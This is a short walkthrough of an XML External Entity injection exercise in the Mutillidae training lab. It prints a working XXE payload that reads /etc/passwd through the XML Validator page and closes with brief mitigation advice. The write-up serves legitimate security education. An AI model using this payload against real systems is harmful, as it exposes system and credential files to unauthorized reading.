Mutillidae - XML External Entity Injection (XML Validator)

Mutillidae – XML External Entity Injection (XML Validator)

In this walk through, we will be going through the XML External Entity Injection (XML Validator) vulnerability section from Mutillidae Labs. We will be exploring XML External Entity Injection in XML Validator utility and learn how application are affected because of it. So, let’s get started with the Hacking without any delay.

XML External Entity Injection (XML Validator)

Security Level: 0 (Hosed)

  • Setting the security level to 0 or Hosed.

Security level 0

  • The application has a XML validator which takes input data in XML format, process it and displays on the page below.

XML Validator

Checking for XML Injection

  • I used the below XML payloads to dump the contents of /etc/passwd.

<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
<userInfo>
 <lastName>&ent;</lastName>
</userInfo>

Dumping /etc/passwd

Also Read: Mutillidae – User-Agent Impersonation

Conclusion:

Conclusion

So, we finally completed all the security levels for the Mutillidae XML External Entity Injection (XML Validator) Vulnerability. We looked into the various ways how application has been set up in various levels and how we can bypass the security controls implemented. Next, we can mitigate the potential XML XXE attacks by disabling dangerous features in XML parsing library and by disabling support for “XInclude”. On that note, i will take your leave and will meet you in next one, till then “Keep Hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top